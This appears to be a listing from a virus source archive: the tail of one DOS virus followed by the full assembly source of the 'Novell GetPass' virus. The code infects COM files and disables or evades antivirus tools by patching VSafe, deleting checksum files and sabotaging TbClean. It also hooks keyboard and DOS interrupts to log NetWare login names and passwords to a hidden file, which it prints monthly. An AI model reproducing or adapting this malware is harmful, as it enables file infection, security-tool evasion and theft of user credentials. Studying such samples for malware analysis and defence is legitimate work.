INT 21 ;|
USE_OLD:
MOV AH,0E ;| Reactivate the selected (use old drive)
MOV DL,CS:DRIVE ;| drive at the start of the program, and
INT 21 ;| reactivate the selected path at the start
MOV AH,3B ;| of the program.(use old drive)
LEA DX,OLD_PATH-1 ;| (get old path and backslash)
INT 21 ;|
RET ;|
SEARCH_ORDER DB 0FF,1,0,2,3,0FF,00,0FF
POINTER DW 0000 ;| (pointer f. search order)
COUNTER DW 0000 ;| (counter f. nth. search)
DISKS DB 0 ;| (number of disks)
MASKE_COM DB Ò*.COMÓ,00 ;| (search for com files)
MASKE_DIR DB Ò*Ó,00 ;| (search for dirÕs)
MASKE_EXE DB 0FF,0,0,0,0,0,00111111XB
DB 0,Ó????????EXEÓ,0,0,0,0
DB 0,Ó????????COMÓ,0
MASKE_ALL DB 0FF,0,0,0,0,0,00111111XB
DB 0,Ó???????????Ó,0,0,0,0
DB 0,Ó????????COMÓ,0
BUFFER EQU 0E00 ;| (a safe place)
BUFLEN EQU 208H ;| Length of virus. Modify this accordingly
;| if you modify this source. Be careful
;| for this may change!
JMPBUF EQU BUFFER+BUFLEN ;| (a safe place for jmp)
PATH DB Ò\Ó,0 ;| (first place)
DRIVE DB 0 ;| (actual drive)
BACK_SLASH DB Ò\Ó
OLD_PATH DB 32 DUP (?) ;| (old path)


785
MSDOS/Virus.MSDOS.Unknown.getpass!.asm Normal file
View File

@ -0,0 +1,785 @@
;=============================================================================
; Please feel free to distribute, but do NOT change and say it's your's!
;=============================================================================
; You are now looking at the source code of the Novell GetPass virus!
; Stop doing so! But if you don't well, ok! The GetPass virus is fairly
; unique in some parts of it's behaviour. It infects *.COM files using
; an infection interrupt routine.(INT D0) It first renames the files
; it infects to a *.TXT file to avoid heuristic alarms of some rule
; based TSR's and then restores the original extention. Some resident
; anti-viral products will be completely disabled in memory and their
; CRC check files will be deleted. The GetPass routine will become
; resident if the virus detects that NETX (Novell NetWare) is loaded
; in memory, hooking INT 16 (keyboard) and INT 21 in memory.
; The GetPass routine activates when LOGIN is executed. The users login
; name and his/her password will be captured and written to a file wich
; will be created in C:\DOS.(the file is MSD.INI) If the file becomes
; approximatly 8Kb, the virus deletes the file. This to avoid a very large
; file in the DOS directory. A new file will be created and the logging
; will continue. Every first day of the month, when an infected program
; is executed the file containing the names/passwords is printed if there
; is a printer available. The virus does not infect COMMAND.COM.
;
; Greetings ,ThE wEiRd GeNiUs
;
; PS: Check your MSD.INI file once in a while!
;-----------------------------------------------------------------------------
; Assemble with TASM 2.0 or higher, Link with TLINK /T
;-----------------------------------------------------------------------------
CODE SEGMENT
ASSUME CS:CODE,DS:CODE,ES:CODE,SS:CODE
CRYPTLEN EQU CHKTIME-CSTART-1;Length to en/decrypt.
VIRLEN EQU BUFFER-VSTART ;Length of virus.
MINLEN EQU 1000 ;Min file length to infect.
MAXLEN EQU 0F230h ;Max " " " "
CR EQU 0Dh ;Return.
LF EQU 0Ah ;Line feed.
TAB EQU 09h ;Tab.
INTRO EQU LBIT-INAME ;
TSRLEN EQU LASTBYT-TSR ;Length of activation TSR.
TSR2LEN EQU NOTENC-INFECT+1;Length of infection Interrupt.
LENGTH EQU VAL_1-CSTART ;Length of encrypted code.
KBUFF EQU KEYBUFF-TSR ;\
KPTR EQU KEYPTR-TSR ;
FN EQU FNAME-TSR ;
LOGINL EQU LOGIN-TSR ;
KFLAG EQU KBFLAG-TSR ; Offsets in activation TSR.
INTOF EQU INT21-TSR ;
INT16L EQU INT16-TSR ;
OLD16L EQU NINT16-TSR ;
NINTOF EQU NINT21-TSR ;
COUCR EQU CCOUNT-TSR ;
PARLEN EQU PARAM-TSR ;/
ORG 0100h
.RADIX 16
;-----------------------------------------------------------------------------
; Infected dummy program. (Only in 1st run)
;-----------------------------------------------------------------------------
START: JMP VSTART ;Jump to virus code.
;-----------------------------------------------------------------------------
; Begin of the virus code.
;-----------------------------------------------------------------------------
VSTART: CALL CHKDOS ;-Confuse anti-viral progs.
CALL CHKTIME ;/
BEGIN: CALL ENCRYP ;Call decryption routine.
;-----------------------------------------------------------------------------
; From here the code will be encrypted.
;-----------------------------------------------------------------------------
CSTART: CALL BEGIN1 ;Same old trick.
CALL RESBEG ;Restore begin.
CALL CHKDRV ;Check drive & DOS version.
CALL SAVEDIR ;Save startup directory.
PUSH ES ;In the next sessions ES is modified.
CALL INT24 ;NoErrorAllowed.
CALL VSAFE ;Vsafe resident?
CALL ACTIVE ;Install password routine.
POP ES ;Restore extra segment.
CALL ENKEY ;Create new CRYPTKEY.
CALL INSTSR2 ;Place infection routine in memory.
CALL DTA ;Store old and give up new DTA addres.
CALL FIND1 ;Determine how many path's are present.
CALL RANDOM ;Random value for directory search.
CALL FIND2 ;Find suitable directory.
CALL CHDRIVE ;If it is on another drive.
CALL GODIR ;Go to the selected directory.
F_FIRST:MOV AH,4Eh ;Search for 1st *.COM
MOV CX,110b ;Look for read only, system & hidden.
LEA DX,[BP+OFFSET SPEC] ;Offset file specification.(*.COM)
INT 21h ;Call DOS.
JNC OPENF ;Exit if no file found.
CALL EXIT1 ;No files found, quit.
OPENF: CALL CHKCOM ;-Is it COMMAND.COM?
CMP CX,00h ;/
JE LETSGO ;Yes, do NOT infect.
CALL CHKINF ;Already infected?
CALL ATTRIB ;Ask & clear file attributes.
CALL RENAME ;Rename to *.TXT file.
MOV AH,4Eh ;Search the name.TXT file.
MOV CX,110b ;Read only, system & hidden.
LEA DX,[BP+OFFSET NEWNAM] ;Offset file specification.(name.TXT)
INT 21h ;Call DOS.
MOV AX,3D02h ;Open file with read and write access.
LEA DX,[BP+OFFSET NEWNAM] ;Offset file specification.(name.TXT)
INT 21h ;Call DOS.
MOV BYTE PTR[BP+OFFSET HANDLE],AL;Save file handle.
CALL STIME ;Save file date & time.
CHECK: MOV AH,3Fh ;Read begin of victim.
MOV CX,3 ;Read Begin.
LEA DX,[BP+OFFSET ORIGNL] ;Into offset original instructions.
INT 21h ;Call DOS.
JC CLOSE ;On error, quit.
REPLACE:CALL BPOINT ;Move file pointer to end of victim.
SUB AX,3 ;Calculate new jump.
MOV WORD PTR[BP+NEWJMP+1],AX;Store new jump value.
MOV AX,4200h ;Move file pointer to begin.
XOR CX,CX ;Zero high nybble.
XOR DX,DX ;Zero low nybble.
INT 21h ;Call DOS.
MOV AH,40h ;Write to file,
MOV CX,3 ;3 Bytes.
LEA DX,[BP+OFFSET NEWJMP] ;Offset new jump value.
INT 21h ;Call DOS.
CALL BPOINT ;Move file pointer to end.
JMP INFEC ;Create encryption key.
LETSGO: MOV AH,4Fh ;Find next.
INT 21h ;Call DOS.
JC EXIT ;On error, quit.
JMP OPENF ;Open new victim.
INFEC: MOV DL,[BP+OFFSET VAL_1] ;Encryption value into DL.
INT 0D0h ;Neat way to infect a file!
CLOSE: CALL RTIME ;Restore File time & date.
MOV AH,3Eh ;Close file.
INT 21h ;Call DOS.
CALL RENAME2 ;Restore back to COM file.
CALL RATTRIB ;Restore File attributes.
;-----------------------------------------------------------------------------
EXIT: CALL DELSTUF ;Delete CRC checkers.
EXIT1: MOV AH,1Ah ;Restore old DTA.
MOV DX,[BP+OFFSET OLD_DTA] ;Old DTA address.
INT 21h ;Call DOS.
EXIT2: MOV AH,0Eh ;Restore startup drive.
MOV DL,BYTE PTR[BP+OFFSET OLDRV];Old drive code.
INT 21h ;Call DOS.
MOV AH,3Bh ;Goto startup directory,
LEA DX,[BP+OFFSET BUFFER] ;that is stored here.
INT 21h ;Call DOS.
EXIT3: CALL RINT24 ;Restore original INT 24
EXIT4: MOV AX,100h ;
PUSH AX ;
RET ;Pass control to HOST.
;-----------------------------------------------------------------------------
DUMEX: MOV DI,0100h ;This is a dummy exit, it screws up
LEA SI,[BP+DEXIT] ;TbClean. In stead of cleaning the
MOV CX,3 ;phile, it puts a program terminating
REPNZ MOVSB ;interrupt in the beginning of the
MOV AX,0100h ;victim, neat huh!
PUSH AX ;
RET ;
;-----------------------------------------------------------------------------
BETWEEN:MOV AH,3Eh ;Close the file.
INT 21h ;Call DOS
JMP LETSGO ;Find next file.
CHKINF: MOV AX,3D00h ;Open file with only read acces.
MOV DX,WORD PTR[BP+OFFSET NP];Offset filename.
INT 21h ;Call DOS.
MOV BX,AX ;File handle into BX.
MOV CX,0FFFFh ;- Move -3 into CX,DX.
MOV DX,0FFFCh ;/
MOV AX,4202h ;Move file pointer to end-3
INT 21h ;Call DOS.
MOV AH,3Fh ;Read file.
MOV CX,01h ;One Byte.
LEA DX,[BP+OFFSET MARK1] ;Into this address.
INT 21h ;Call DOS.
CMP BYTE PTR [BP+OFFSET MARK1],43h; Is it infected?
JE BETWEEN ;Yes, find another.
CALL BPOINT ;Go to EOF.
CMP AX,MAXLEN ;Is the file to long?
JNB BETWEEN ;Yes, find another.
CMP AX,MINLEN ;Is it to short?
JBE BETWEEN ;Yes, find another.
MOV AH,3Eh ;Close the file.
INT 21h ;Call DOS
RET ;Return to caller.
;-----------------------------------------------------------------------------
CHKDRV: CALL CHKDOS ;Check DOS version.
CMP AL,01 ;
JB DUMEX ;Screw up TbClean.
CMP AL,05h ;Is it DOS 5.0 or higher?
JNGE EXIT4 ;No, exit.
MOV AH,19h ;Get drive code.
INT 21h ;Call DOS.
MOV BYTE PTR[BP+OFFSET OLDRV],AL;Save old drive code.
RET ;Return to caller.
;-----------------------------------------------------------------------------
RESBEG: LEA SI,[BP+OFFSET ORIGNL] ;Offset original begin.
MOV DI,0100h ;Restore original instructions.
MOV CX,3 ;Restore 3 bytes.
REPNZ MOVSB ;Move them.
RET ;Return to caller.
;-----------------------------------------------------------------------------
CHKCOM: MOV CX,05 ;CX=len COMMAND.
MOV DI,[BP+OFFSET NP] ;Offset found file.
LEA SI,[BP+OFFSET COMMND] ;Offset COMMAND.
REPZ CMPSB ;Compare the strings.
RET ;Return to caller.
;-----------------------------------------------------------------------------
RENAME: MOV CX,0Ch ; This section renames the
MOV SI,WORD PTR[BP+OFFSET NP]; found and approved for
LEA DI,WORD PTR[BP+OFFSET NEWNAM]; infection file to a
REPNZ MOVSB ; *.TXT file. The reason for
LEA BX,WORD PTR[BP+OFFSET NEWNAM-1];this is that VPROTECT from
LPOINT: INC BX ; Intel has a rule based NLM.
CMP BYTE PTR[BX],'.' ; If we write to a COM file
JNE LPOINT ; VPROTECT gives an alarm
MOV DI,BX ; message. However, if we
MOV WORD PTR[BP+OFFSET TXTPOI],BX; write to a text file....
LEA SI,[BP+OFFSET TXT] ; Pretty solution isn't it?
MOVSW ;
MOVSW ;
MOV DX,WORD PTR[BP+OFFSET NP];
LEA DI,WORD PTR[BP+OFFSET NEWNAM];
MOV AH,56h ;Rename file function.
INT 21h ;Call DOS.
RET ;Return to caller.
;-----------------------------------------------------------------------------
RENAME2:LEA SI,[BP+OFFSET SPEC+1] ; In this section we
MOV DI,WORD PTR[BP+OFFSET TXTPOI]; give the infected file
MOVSW ; its old extention back.
MOVSW ; (*.COM)
MOV DX,WORD PTR[BP+OFFSET NP];
LEA DI,WORD PTR[BP+OFFSET NEWNAM];
MOV AH,56h ;Rename file function.
INT 21h ;Call DOS.
RET ;Return to caller.
;-----------------------------------------------------------------------------
ENKEY: CALL CHKTIME ;Get time.
MOV BYTE PTR[BP+OFFSET VAL_1],DL;New encryption key.
RET ;Return to caller.
;-----------------------------------------------------------------------------
SAVEDIR:MOV BYTE PTR[BP+OFFSET BUFFER],5Ch;Put a slash in DTA.
MOV DL,BYTE PTR[BP+OFFSET OLDRV];Drive code.
INC DL ;DL+1 because functions differ.
MOV AH,47h ;Get current directory.
LEA SI,[BP+OFFSET BUFFER+1] ;Store current directory.
INT 21h ;Call DOS.
RET ;Return to caller.
;-----------------------------------------------------------------------------
DTA: MOV AH,2Fh ;Get DTA address.
INT 21h ;Call DOS.
MOV WORD PTR[BP+OFFSET OLD_DTA],BX; Save here.
LEA DX,[BP+OFFSET NEW_DTA] ;Offset new DTA address.
MOV AH,1Ah ;Give up new DTA.
INT 21 ;Call DOS.
ADD DX,1Eh ;Filename pointer in DTA.
MOV WORD PTR[BP+OFFSET NP],DX;Put in name pointer.
RET ;Return to caller.
;-----------------------------------------------------------------------------
INT24: MOV AX,3524h ;Get int 24 handler.
INT 21h ;into [ES:BX].
MOV WORD PTR[BP+OLDINT],BX ;Save it.
MOV WORD PTR[BP+OLDINT+2],ES;
MOV AH,25h ;Set new int 24 handler.
LEA DX,[BP+OFFSET NEWINT] ;DS:DX->new handler.
INT 21h ;Call DOS.
RET ;Return to caller.
;-----------------------------------------------------------------------------
RINT24: PUSH DS ;Save data segment.
MOV AX,2524h ;Restore int 24 handler
LDS DX,[BP+OFFSET OLDINT] ;to original.
INT 21h ;Call DOS.
POP DS ;Restore data segment.
RET ;Return to caller.
;-----------------------------------------------------------------------------
VSAFE: MOV AX,3516h ;Get interrupt vector INT 16.
INT 21h ;(Now we know in wich segment it is.)
MOV WORD PTR[BP+OFFSET NINT16],BX; - Store old INT 16 in TSR.
MOV WORD PTR[BP+OFFSET NINT16+2],ES;/
ADD BX,0364h ;Here we find a jump that w'ill change.
CMP WORD PTR[ES:BX],0945h ;Is it THE jump?
JNE OK_9 ;No, already modified or not resident.
MOV WORD PTR[ES:BX],086Dh ;Yes, modify it.
OK_9: RET ;Return to caller. No Vsafe.
;-----------------------------------------------------------------------------
FIND1: MOV BYTE PTR[BP+OFFSET VAL_2],0FFh; This routine is derivied from
MOV BX,01h ; the VIENNA virus.
FIND2: PUSH ES ;- Save registers.
PUSH DS ;/
MOV ES,DS:2CH ;
MOV DI,0 ;ES:DI points to environment.
FPATH: LEA SI,[BP+OFFSET PATH] ;Point to "PATH=" string in data area.
LODSB ;
MOV CX,OFFSET 8000H ;Environment can be 32768 bytes long.
REPNZ SCASB ;Search for first character.
MOV CX,4 ;Check if path
LOOP_2: LODSB ;is complete.
SCASB ;
JNZ FPATH ;If not all there, abort & start over.
LOOP LOOP_2 ;Loop to check the next character.
XCHG SI,DI ;Exchange registers.
MOV CL,BYTE PTR[BP+OFFSET VAL_2];Random value in CL.
PUSH ES ;\
POP DS ;-) Get DS, ES on address.
POP ES ;/
OK_14: LEA DI,[BP+OFFSET NEW_DTA+50];Offset address path.
OK_10: MOVSB ;Get name in path.
MOV AL,[SI] ;
CMP AL,0 ;Is it at the end?
JE OK_11 ;Yes, replicate.
CMP AL,3Bh ;Is it ';'?
JNE OK_10 ;Nope, next letter.
INC SI ;For next loop. ';'=';'+1.
INC BX ;
LOOP OK_14 ;Loop until random value = 0.
OK_11: POP DS ;Restore data segment.
MOV AL,0 ;Place space after the directory.
MOV [DI],AL ;
RET ;Return to caller.
;-----------------------------------------------------------------------------
DELSTUF:MOV BX,01h ;Set counter
PUSH BX ;and push it.
LEA DX,[BP+OFFSET MICRO] ;Is there a CHKLIST.MS file?
JMP INTER ;Check it out.
SECOND: LEA DX,[BP+OFFSET TBAV] ;Is there a ANTI-VIR.DAT file?
INC BX ;Increase counter
PUSH BX ;and push it.
JMP INTER ;Check it out.
THIRD: LEA DX,[BP+OFFSET CENTRAL] ;Is there a CHKLIST.CPS file?
INC BX ;Increase counter
PUSH BX ;and push it
INTER: MOV AH,4Eh ;Find first matching entry.
MOV CX,110b ;Search all attributes.
INT 21h ;Call DOS.
JC NODEL ;No match, find next.
CALL ATTRIB ;Clear attributes.
MOV AH,41h ;Delete file.
INT 21h ;Call DOS.
NODEL: POP BX ;Pop counter.
CMP BX,01 ;Had the first one?
JE SECOND ;Yes, do the second.
CMP BX,02 ;Was it the second?
JE THIRD ;Yes, do the third.
RET ;Finished, return to caller.
;-----------------------------------------------------------------------------
CHDRIVE:MOV CX,0FFFFh ;Clear CX.
MOV BL,'A'-1 ;AH=40
OK_15: INC BL ;AH=41='A'
INC CX ;CX=1
CMP BL,BYTE PTR[BP+OFFSET NEW_DTA+50];New drive letter.
JNE OK_15 ;Not the same, go again.
MOV DL,CL ;Calculated the new drive code.
MOV AH,0Eh ;Give up new drive code.
INT 21h ;Call DOS.
RET ;Return to caller.
;-----------------------------------------------------------------------------
RTIME: MOV AX,5701h ;Restore time & date.
MOV CX,WORD PTR[BP+OFFSET TIME];Old time.
MOV DX,WORD PTR[BP+OFFSET DATE];Old date.
INT 21h ;Call DOS.
RET ;Return to caller.
;-----------------------------------------------------------------------------
STIME: MOV AX,5700h ;Get file date & time.
MOV BX,[BP+OFFSET HANDLE] ;File Handle.
INT 21h ;Call DOS.
MOV WORD PTR[BP+OFFSET TIME],CX;Store time.
MOV WORD PTR[BP+OFFSET DATE],DX;Store date.
RET ;Return to caller.
;-----------------------------------------------------------------------------
BPOINT: XOR DX,DX ;Zero register.
MOV AX,4202h ;Move file pointer to top.
XOR CX,CX ;Zero register.
INT 21h ;Call DOS.
RET ;Return to caller.
;-----------------------------------------------------------------------------
ACTIVE: PUSH DS ;Save register.
INT 17h ;Check for NETX.
CMP AH,01h ;NETX resident?
JNE RESID ;Nope, do not install TSR.
CALL CREATE ;If not exsists, create password file.
CALL TIMER ;Time to print the password file?
MOV AX,3D3Dh ;Do resident check.
INT 21h ;Call BIOS.
CMP AX,1111h ;Already resident?
JE RESID ;If so, exit.
MOV AX,0044h ;Move code into hole in system
MOV ES,AX ;memory.
MOV DI,0100h ;ES:BX = 0044:0100
LEA SI,[BP+OFFSET TSR] ;Begin here
MOV CX,TSRLEN ;and this many bytes.
REP MOVSB ;Do it.
MOV DS,CX ;Get original INT 21 vector
MOV SI,0084h ;DS:SI = 0000:0084
MOV DI,0100h+NINTOF ;Store it in TSR
MOVSW ;One word,
MOVSW ;and another.
PUSH ES ;Restore register.
POP DS ;Restore register
MOV AX,2521h ;Give up new INT 21 vector.
MOV DX,0100h+INTOF ;Offset new INT 21.
INT 21h ;Call DOS.
MOV AX,2516h ;Give up new INT 16 vector.
MOV DX,0100h+INT16L ;Offset new INT 16.
INT 21h ;Call DOS.
RESID: POP DS ;- Restore register.
RET ;Return to caller.
;-----------------------------------------------------------------------------
TSR: DB 0 ; This is THE cool part!
;-----------------------------------------------------------------------------
INT21: CMP AX,4B00h ;Execute?
JE OK_16 ;Yep, do IT !
CMP AX,3D3Dh ;Resident check?
JNE DO_OLDI ;Nope, do original INT 21.
MOV AX,1111h ;Give up resident FLAG.
IRET ;Return to viral code.
DO_OLDI:JMP DWORD PTR CS:[0100+NINTOF];Do the original INT 21.
OK_16: PUSH BX ;\
PUSH CX ; \
PUSH DX ; ) Save registers.
PUSH DS ; /
PUSH ES ;/
MOV SI,0 ;
MOV BX,DX ;Name pointer into BX.
HERE: CMP BYTE PTR[BX],'.' ;Is it a point?
JE FOLLOW ;Yes, collected the name, cont.
INC BX ;BX+1
JMP HERE ;Get next character.
FOLLOW: SUB BX,05h ;Because LOGIN is 5 characters.
THERE: MOV AL,BYTE PTR [CS:0100+LOGINL+SI];Char into AL.
CMP BYTE PTR[BX+SI],'.' ;Did we make it until the point?
JE GETPASS ;It is LOGIN, get the password!
XOR AL,DS:[BX+SI] ;(XOR LOGIN,LOGIN)
JZ FOLLOW1 ;If XOR = 0 we have an equal char.
JMP ISNOT ;If not, well execute and do nothing.
FOLLOW1:INC SI ;Next char.
JMP THERE ;And compare again. (we must be shure.)
ISNOT: JMP ENDPARS ;Return to caller.
LOGIN DB 'LOGIN',0 ;Used to compare.
KBFLAG DB 0 ;Keyboard interrupt activation flag.
FNAME DB 'C:\DOS\MSD.INI',0 ;Password file specification.
KEYPTR DW 0 ;Keyboard pointer.
CCOUNT DB 0 ;\
CRETURN DB 0 ;/ Carriage return counter.
;-----------------------------------------------------------------------------
GETPASS:MOV BYTE PTR[CS:0100+KFLAG],0FFh;Set interrupt 16 flag.
POP ES ;\
POP DS ; \
POP DX ; ) Restore registers.
POP CX ; /
POP BX ;/
PUSH BX ;\
PUSH CX ; \
PUSH DX ; ) Save registers.
PUSH DS ; /
PUSH ES ;/
MOV DS,ES:[BX+04] ;\ Get param.pointer ES:SI
MOV SI,ES:[BX+02] ;/
PUSH CS ; \
POP ES ; ) Get keybuff pointer DS:DI
MOV DI,OFFSET[CS:0100+KBUFF]; /
XOR CX,CX ;
MOV CL,BYTE PTR DS:[SI] ;CX IS PARAM.LEN.
INC SI ;
INC SI ;
CMP CL,10h ;
JG ENDPARS ;
CMP CL,00h ;No parameters.
JE BRANCH ;
MOV BYTE PTR[CS:0100+COUCR],01h;
ENDFD: INC CX ;
MOV WORD PTR[CS:0100+KPTR],CX;Set keyb.index op len param.
DEC CX ;
REPNZ MOVSB ;
MOV BYTE PTR ES:[DI-1],CR ;
MOV BYTE PTR ES:[DI],LF ;
JMP ENDPARS ;
BRANCH: MOV BYTE PTR[CS:0100+COUCR],02h;
ENDPARS:POP ES ;\
POP DS ; \
POP DX ; ) Restore registers.
POP CX ; /
POP BX ;/
MOV AX,4B00h ;
JMP DWORD PTR CS:[0100+NINTOF];Do the original INT 21.
PARAM DB 0 ;
;-----------------------------------------------------------------------------
INT16: CMP BYTE PTR[CS:0100+KFLAG],0FFh;Is it login.?
JE NEXTCHK ; Yes! Get the password!
THE_END:JMP DWORD PTR[CS:0100+OLD16L];Nope, do old INT 16.
NEXTCHK:CMP AH,00h ; Keyboard funtion call?
JE TAKCHAR ; Yes, continue.
CMP AH,10h ; Keyboard function call?
JNE THE_END ;
TAKCHAR:PUSHF ;Push flag register.
CALL DWORD PTR[CS:0100+OLD16L];Call old INT 16.
PUSH DS ;\
PUSH CS ; \
POP DS ; \
PUSH AX ; ) Save regs and set DS
PUSH BX ; /
PUSH CX ; /
PUSH DX ;/
CMP AL,00H ; No key typed
JE RESREGS ;
MOV BX,WORD PTR[CS:0100+KPTR]; Keybuf index
CMP BX,001Bh ; Max. length of kbuff.
JGE RESREGS ; End int16
CMP AL,CR ; If key = <Return>
JE COUNTCR ;
BACK: MOV BYTE PTR[CS:0100+KBUFF+BX],AL; Copy char into KBuffer
INC BX ;
MOV WORD PTR[CS:0100+KPTR],BX;
RESREGS:POP DX ;\
POP CX ; \
POP BX ; ) Restore regs.
POP AX ; /
POP DS ;/
IRET ; Return
COUNTCR:MOV AL,LF ;Line feed into AL.
DEC BYTE PTR[CS:0100+COUCR] ;Decrease CR counter.
CMP BYTE PTR[CS:0100+COUCR],00h;Is it zero?
JE OVER_2 ;Nope, continue logging.
MOV BYTE PTR[CS:0100+KBUFF+BX],CR; Copy char into KBuffer
INC BX ;
MOV WORD PTR[CS:0100+KPTR],BX;
MOV AL,LF ;
JMP BACK ;
OVER_2: MOV AL,CR ;CR into AL.
MOV BYTE PTR[CS:0100+KBUFF+BX],AL;Copy CR into KBuffer.
INC BX ;Increase buffercounter.
MOV BYTE PTR[CS:0100+KBUFF+BX],LF;Copy char into KBuffer.
INC BX ;Increase buffercounter.
MOV BYTE PTR[CS:0100+KBUFF+BX],LF;Copy char into KBuffer.
CALL WFILE ;Write buffer to the logfile.
MOV BYTE PTR[CS:0100+KFLAG],00h;
MOV WORD PTR[CS:0100+KPTR],00h;
JMP RESREGS ;Restore registers.
WFILE: PUSH AX ;\
PUSH BX ;
PUSH DX ; Save registers.
PUSH CX ;
PUSH DS ;/
PUSH CS ;\ Get Data segment on address.
POP DS ;/
MOV AX,3D02h ;Open file function.
MOV DX,OFFSET[CS:0100+FN] ;Offset file spec.
INT 21h ;Call DOS.
JC FAILURE ;On error, quit.
XCHG BX,AX ;Into BX.
MOV AX,4202h ;Mov file handle to EOF.
XOR CX,CX ;CX=0
XOR DX,DX ;DX=0
INT 21h ;Call DOS.
CMP AX,2000h ;File on max lenght?
JGE FAILURE ;If so, exit.
WRITE: MOV CX,CS:[0100+KPTR] ;BX = keyboard pointer.
ADD CX,03h ;+3.
MOV DX,OFFSET CS:[0100+KBUFF];Offset keyboard buffer.
MOV AH,40h ;Write to file function.
INT 21h ;Call DOS.
FCLOSE: MOV AH,3Eh ;Close file funtion.
INT 21h ;Call DOS.
FAILURE:POP DS ;\
POP DX ;
POP CX ; Restore registers.
POP BX ;
POP AX ;/
RET ;Return to caller.
;-----------------------------------------------------------------------------
NINT21: DW 0 ;- Original INT 21 vector.
DW 0 ;/
NINT16: DW 0 ;- Original INT 16 vector.
DW 0 ;/
KEYBUFF DB 1dh DUP (?) ;Keyboard buffer.
LASTBYT:DB 0 ;Last Resident Byte.
;-----------------------------------------------------------------------------
ATTRIB: MOV DX,WORD PTR[BP+OFFSET NP];Offset in DTA.
MOV AX,4300h ;Ask file attributes.
INT 21h ;Call DOS.
LEA BX,[BP+OFFSET ATTR] ;Save address for old attributes.
MOV [BX],CX ;Save it.
XOR CX,CX ;Clear file attributes.
MOV AX,4301h ;Write file attributes.
INT 21h ;Call DOS.
JNC OK ;No error, proceed.
CALL EXIT ;Oh Oh, error occured. Quit.
OK: RET ;Return to caller.
;-----------------------------------------------------------------------------
RATTRIB:LEA DX,[BP+OFFSET NEWNAM] ;Offset file specification.(name.TXT)
LEA BX,[BP+OFFSET ATTR] ;Offset address old attributes.
MOV CX,[BX] ;Into CX.
MOV AX,4301h ;Write old values back.
INT 21h ;Call DOS.
RET ;Return to caller.
;-----------------------------------------------------------------------------
GODIR: LEA DX,[BP+OFFSET NEW_DTA+52];Offset directory spec.
MOV AH,3Bh ;Goto the directory.
INT 21h ;Call DOS.
RET ;Return to caller.
;-----------------------------------------------------------------------------
RANDOM: CALL CHKTIME ;Get system time.
MOV CX,0 ;Figure this out by yourself.
MOV AX,100d ;It is a random generator with
OK_19: INC CX ;two variable inputs.
SUB AX,BX ;A: How many dir's in the path.
CMP AX,01d ;B: Random system time. (jiffies)
JGE OK_19 ;With this values, we create a
XOR BX,BX ;random value between 1 and A.
OK_20: INC BX ;
SUB DL,CL ;
CMP DL,01d ;
JGE OK_20 ;
MOV BYTE PTR[BP+OFFSET VAL_2],BL;Save value.
RET ;Return to caller.
;-----------------------------------------------------------------------------
BEGIN1: PUSH SP ;
POP BX ;Everything is related to BP.
MOV BP,WORD PTR[BX] ;
SUB BP,10Fh ;In first run BP=0
RET ;
;-----------------------------------------------------------------------------
NEWINT: MOV AL,03h ;New INT 24.
IRET ;No more write protect errors!
;-----------------------------------------------------------------------------
TIMER: PUSH DS ;Save data segment.
MOV AX,0044h ;\
MOV DS,AX ;- DS=resident segment.
CMP BYTE PTR[DS:0100],01h ;Already printed the file?
POP DS ;Restore data segment.
JE NOPRINT ;Yes, once is enough.
MOV AH,2Ah ;Get system date.
INT 21h ;Call DOS.
CMP DL,01h ;Is it the 1st of the month?
JNE NOPRINT ;Nope, don't print the passwords.
MOV AX,3D01h ;Open device PRN (printer)
LEA DX,[BP+OFFSET PRINT] ;Offset spec.
INT 21h ;Call DOS.
MOV DI,AX ;Save handle.
MOV AX,3D00h ;Open Password file.
LEA DX,[BP+OFFSET FNAME] ;File spec.
INT 21h ;Call DOS.
MOV SI,AX ;Save handle.
GOPRINT:MOV AH,3Fh ;Read file function.
MOV BX,SI ;File handle into BX.
MOV CX,01h ;Read one byte.
LEA DX,[BP+OFFSET OUTPUT] ;Into this address.
INT 21h ;Call DOS.
CMP AL,0 ;EOF?
JE READY ;If equal, ready.
MOV AH,40h ;Write to file function.
MOV BX,DI ;File handle into BX.
MOV CX,01h ;Write one byte.
LEA DX,[BP+OFFSET OUTPUT] ;Offset output.
INT 21h ;Call DOS.
JMP GOPRINT ;Next byte.
READY: MOV AH,3Eh ;Close file.
INT 21h ;Call DOS.
PUSH DS ;
MOV AX,0044h ;
mov DS,AX ;Restore data segment.
MOV BYTE PTR[DS:0100],01h ;Already printed the file?
POP DS ;
NOPRINT:RET ;Return to caller.
;-----------------------------------------------------------------------------
INSTSR2:LEA DI,[BP+OFFSET NEW_DTA+0100h];/
LEA SI,[BP+OFFSET INFECT] ;Offset address infection routine.
MOV CX,TSR2LEN ;Length to install.
REP MOVSB ;Install it.
MOV AX,25D0h ;Give up new INT D0 vector.
LEA DX,[BP+OFFSET NEW_DTA+0100h];
INT 21h ;Call DOS.
RET ;Return to caller.
;-----------------------------------------------------------------------------
PRINT DB 'PRN',0 ;Device=printer.
PATH DB 'PATH=' ;Used to find environment.
SPEC DB '*.COM',0 ;File search specification.
TXT DB '.TXT',0 ;Rename file specification.
OUTPUT DB 0 ;Output byte to printer.
TXTPOI DW 0 ;Pointer in specification.
MARK1 DB 0 ;Used for infection check.
VAL_2 DB 0 ;Random value for directory switching.
OLDRV DB 0 ;Old drive code.
BYTES DB 'TBDRVX',0 ;
COMMND DB 'COMM',0 ;
MICRO DB 'CHKLIST.MS',0 ;- Files to be deleted.
CENTRAL DB 'CHKLIST.CPS',0 ;/
TBAV DB 'ANTI-VIR.DAT',0 ;/
VIRNAME DB 'GETPASS! V3.X',0 ;
BEGIN2 DW 0 ;
NWJMP1 DB 0EBh,0 ;
FLAGT DB 0 ;
OLD_DTA DW 0 ;Old DTA addres.
HANDLE DW 0 ;File handle.
TIME DB 2 DUP (?) ;File time.
DATE DB 2 DUP (?) ;File date.
ATTR DB 1 DUP (?),0 ;Attributes.
NEWJMP DB 0E9h,0,0 ;Jump replacement.
ORIGNL DB 0CDh,020h,090h ;Original instrucitons.
DEXIT DB 0CDh,020h,090h ;Dummy exit instructions.
NEWNAM DB 0Dh DUP (?) ;New file name.
OLDINT DW 0 ;Old INT 24 vector.
NP DW ? ;New DTA address.
;-----------------------------------------------------------------------------
INFECT: PUSH BX ;Save file handle.
PUSH DX ;Save encryption key.
PUSH BX ;Save file handle.
CALL ENCRYPT ;Encrypt the virus code.
POP BX ;Restore file handle.
LEA DX,[BP+OFFSET VSTART] ;Begin here.
MOV CX,VIRLEN ;Write this many Bytes.
MOV AH,40h ;Write to file.
INT 21h ;Call DOS.
POP DX ;Restore encryption value.
CALL ENCRYPT ;Fix up the mess.
POP BX ;Restore file handle.
DUMMY: IRET ;Return to caller.
